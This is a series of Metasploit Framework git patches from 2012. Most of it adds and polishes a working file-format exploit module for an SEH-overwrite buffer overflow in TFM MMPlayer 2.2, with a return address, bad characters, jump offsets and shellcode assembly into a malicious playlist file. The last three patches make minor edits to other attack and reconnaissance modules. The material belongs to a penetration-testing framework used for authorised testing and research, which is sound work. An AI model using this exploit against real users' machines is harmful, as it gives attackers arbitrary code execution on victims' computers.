From 9756f8751744fbda1016b57a7b8861cb413694ef Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 13 Jun 2012 13:50:12 +0930
Subject: [PATCH 1/7] Added TFM MMPlayer (m3u/ppl File) Buffer Overflow module

---
 .../fileformat/tfm_mmplayer_m3u_ppl_bof.rb    | 86 +++++++++++++++++++
 1 file changed, 86 insertions(+)
 create mode 100644 modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb

diff --git a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
new file mode 100644
index 0000000000..6e80376095
--- /dev/null
+++ b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
@@ -0,0 +1,86 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::FILEFORMAT
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'		=> 'TFM MMPlayer (m3u/ppl File) Buffer Overflow',
+			'Description'	=> %q{
+				This module exploits a buffer overflow in MMPlayer 2.2
+				The vulnerability is triggered when opening a malformed M3U/PPL file 
+				that contains an overly long string. This results in overwriting a
+				structured exception handler record.
+			},
+			'License'	=> MSF_LICENSE,
+			'Author'	=>
+				[
+					'RjRjh Hack3r',                            # Original discovery and exploit
+					'Brendan Coles <bcoles[at]gmail[dot]com>', # msf exploit
+				],
+			'References'	=>
+				[
+					[ 'EDB', '18656' ], # .m3u
+					[ 'EDB', '18657' ], # .ppl
+				],
+			'DefaultOptions' =>
+				{
+					'ExitFunction' => 'seh',
+					'InitialAutoRunScript' => 'migrate -f',
+				},
+			'Platform'	=> 'win',
+			'Targets'	=>
+				[
+					# Tested on:
+					# Windows XP Pro SP3 - English
+					# Windows 7 Home Basic SP0 - English
+					# Windows Server 2003 Enterprise SP2 - English
+					[ 'Windows Universal', { 'Ret' => 0x00401390 } ], # p/p/r -> MMPlayer.exe
+				],
+			'Payload'	=>
+				{
+					'Size' => 4000,
+					'BadChars' => "\x00\x0a\x0d",
+					'DisableNops' => false,
+				},
+			'Privileged'	 => false,
+			'DisclosureDate' => '23 Mar 2012',
+			'DefaultTarget'	 => 0
+		))
+
+		register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.ppl']),], self.class)
+
+	end
+
+	def exploit
+
+		nops   = make_nops(10)
+		sc     = payload.encoded
+		offset = Rex::Text.rand_text_alphanumeric(4103 - sc.length - nops.length)
+		jmp    = Rex::Arch::X86.jmp(-4108)            # near jump 4103 bytes
+		nseh   = Rex::Arch::X86.jmp_short(-7)         # jmp back 7 bytes
+		nseh  << Rex::Text.rand_text_alphanumeric(2)
+		seh    = [target.ret].pack('V')
+
+		sploit  = nops
+		sploit << sc 
+		sploit << offset
+		sploit << jmp
+		sploit << nseh
+		sploit << seh
+
+		# write file
+		file_create(sploit)
+
+	end
+end
+

From 940f904dee8dfc25fb5f7b443969849131680d6c Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 14 Jun 2012 12:10:03 +0930
Subject: [PATCH 2/7] Changed date format to new DisclosureDate format. Removed
 two redundant spaces. Now passes msftidy.

---
 .../exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
index 6e80376095..259926933e 100644
--- a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
+++ b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Name'		=> 'TFM MMPlayer (m3u/ppl File) Buffer Overflow',
 			'Description'	=> %q{
 				This module exploits a buffer overflow in MMPlayer 2.2
-				The vulnerability is triggered when opening a malformed M3U/PPL file 
+				The vulnerability is triggered when opening a malformed M3U/PPL file
 				that contains an overly long string. This results in overwriting a
 				structured exception handler record.
 			},
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'DisableNops' => false,
 				},
 			'Privileged'	 => false,
-			'DisclosureDate' => '23 Mar 2012',
+			'DisclosureDate' => 'Mar 23 2012',
 			'DefaultTarget'	 => 0
 		))
 
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		seh    = [target.ret].pack('V')
 
 		sploit  = nops
-		sploit << sc 
+		sploit << sc
 		sploit << offset
 		sploit << jmp
 		sploit << nseh

From 82799f2601dc74e39303b7377d2e37b3b35fe96e Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Thu, 14 Jun 2012 21:46:38 -0500
Subject: [PATCH 3/7] Some final touchup

This commit includes the following changes:
* Description change
* Additional references
* More testing
* Format change
* Other minor stuff
---
 .../fileformat/tfm_mmplayer_m3u_ppl_bof.rb    | 44 +++++++++++--------
 1 file changed, 26 insertions(+), 18 deletions(-)

diff --git a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
index 259926933e..1dc89a1994 100644
--- a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
+++ b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
@@ -8,56 +8,64 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-	Rank = GreatRanking
+	Rank = GoodRanking
 
 	include Msf::Exploit::FILEFORMAT
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'		=> 'TFM MMPlayer (m3u/ppl File) Buffer Overflow',
-			'Description'	=> %q{
+			'Name'           => 'TFM MMPlayer (m3u/ppl File) Buffer Overflow',
+			'Description'    => %q{
 				This module exploits a buffer overflow in MMPlayer 2.2
 				The vulnerability is triggered when opening a malformed M3U/PPL file
-				that contains an overly long string. This results in overwriting a
-				structured exception handler record.
+				that contains an overly long string, which results in overwriting a
+				SEH record, thus allowing arbitrary code execution under the context
+				of the user.
 			},
-			'License'	=> MSF_LICENSE,
-			'Author'	=>
+			'License'        => MSF_LICENSE,
+			'Author'         =>
 				[
-					'RjRjh Hack3r',                            # Original discovery and exploit
-					'Brendan Coles <bcoles[at]gmail[dot]com>', # msf exploit
+					'RjRjh Hack3r',                        # Original discovery and exploit
+					'Brendan Coles <bcoles[at]gmail.com>'  # msf exploit
 				],
-			'References'	=>
+			'References'     =>
 				[
+					[ 'OSVDB', '80532' ],
+					[ 'BID', '52698' ],
 					[ 'EDB', '18656' ], # .m3u
-					[ 'EDB', '18657' ], # .ppl
+					[ 'EDB', '18657' ]  # .ppl
 				],
 			'DefaultOptions' =>
 				{
 					'ExitFunction' => 'seh',
-					'InitialAutoRunScript' => 'migrate -f',
+					'InitialAutoRunScript' => 'migrate -f'
 				},
-			'Platform'	=> 'win',
-			'Targets'	=>
+			'Platform'       => 'win',
+			'Targets'        =>
 				[
 					# Tested on:
 					# Windows XP Pro SP3 - English
+					# Windows Vista SP1 - English
 					# Windows 7 Home Basic SP0 - English
+					# Windows 7 Ultimate SP1 - English
 					# Windows Server 2003 Enterprise SP2 - English
 					[ 'Windows Universal', { 'Ret' => 0x00401390 } ], # p/p/r -> MMPlayer.exe
 				],
-			'Payload'	=>
+			'Payload'        =>
 				{
 					'Size' => 4000,
 					'BadChars' => "\x00\x0a\x0d",
-					'DisableNops' => false,
+					'DisableNops' => false
 				},
 			'Privileged'	 => false,
 			'DisclosureDate' => 'Mar 23 2012',
-			'DefaultTarget'	 => 0
+			'DefaultTarget'  => 0
 		))
 
-		register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.ppl']),], self.class)
+		register_options(
+			[
+				OptString.new('FILENAME', [ true, 'The file name.', 'msf.ppl'])
+			], self.class)
 
 	end
 

From 80d46580ece30c22f090ff46dd40a37fb5798381 Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Thu, 14 Jun 2012 21:48:24 -0500
Subject: [PATCH 4/7] One last minor change for metadata format

---
 modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
index 1dc89a1994..a6e89c8f4b 100644
--- a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
+++ b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'BadChars' => "\x00\x0a\x0d",
 					'DisableNops' => false
 				},
-			'Privileged'	 => false,
+			'Privileged'     => false,
 			'DisclosureDate' => 'Mar 23 2012',
 			'DefaultTarget'  => 0
 		))

From 80a0b4767a1c77dcd4092a85cc1e9d7f39be4b72 Mon Sep 17 00:00:00 2001
From: Steve Tornio <swtornio@gmail.com>
Date: Fri, 15 Jun 2012 09:02:31 -0500
Subject: [PATCH 5/7] add osvdb ref

---
 modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb
index 3dbd5635f9..ce9fe26aab 100644
--- a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb
+++ b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb
@@ -42,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References'    =>
 				[
 					# When a DoS is NOT a DoS
+					[ 'OSVDB', '82798'],
 					[ 'EDB', '19024']
 				],
 			'DefaultOptions' =>

From 5a49ac50f1906881c6b78058b7f0f2776ebbd71f Mon Sep 17 00:00:00 2001
From: Tod Beardsley <todb@metasploit.com>
Date: Fri, 15 Jun 2012 10:33:23 -0500
Subject: [PATCH 6/7] Shorten option description on enum_dns

---
 modules/auxiliary/gather/enum_dns.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/gather/enum_dns.rb b/modules/auxiliary/gather/enum_dns.rb
index 8d70d2a412..be34269e76 100644
--- a/modules/auxiliary/gather/enum_dns.rb
+++ b/modules/auxiliary/gather/enum_dns.rb
@@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
 			[
 				OptString.new('DOMAIN', [ true, "The target domain name"]),
 				OptBool.new('ENUM_AXFR', [ true, 'Initiate a zone transfer against each NS record', true]),
-				OptBool.new('ENUM_TLD', [ true, 'Perform a top-level domain expansion by replacing the TLD and testing against IANA TLD list', false]),
+				OptBool.new('ENUM_TLD', [ true, 'Perform a TLD expansion by replacing the TLD with the IANA TLD list', false]),
 				OptBool.new('ENUM_STD', [ true, 'Enumerate standard record types (A,MX,NS,TXT and SOA)', true]),
 				OptBool.new('ENUM_BRT', [ true, 'Brute force subdomains and hostnames via the supplied wordlist', false]),
 				OptBool.new('ENUM_IP6', [ true, 'Brute force hosts with IPv6 AAAA records',false]),

From 5006db755054085cc1ac6da755f1ae35d317c850 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Fri, 15 Jun 2012 10:55:07 -0500
Subject: [PATCH 7/7] The cert module now defaults SSL to true (didnt make
 sense)

---
 modules/auxiliary/scanner/http/cert.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/cert.rb b/modules/auxiliary/scanner/http/cert.rb
index 271a2e043a..c9bfe79e2c 100644
--- a/modules/auxiliary/scanner/http/cert.rb
+++ b/modules/auxiliary/scanner/http/cert.rb
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
 	# Fingerprint a single host
 	def run_host(ip)
 
-		connect
+		connect(true, {"SSL" => true}) #Force SSL
 		cert  = OpenSSL::X509::Certificate.new(sock.peer_cert)
 		disconnect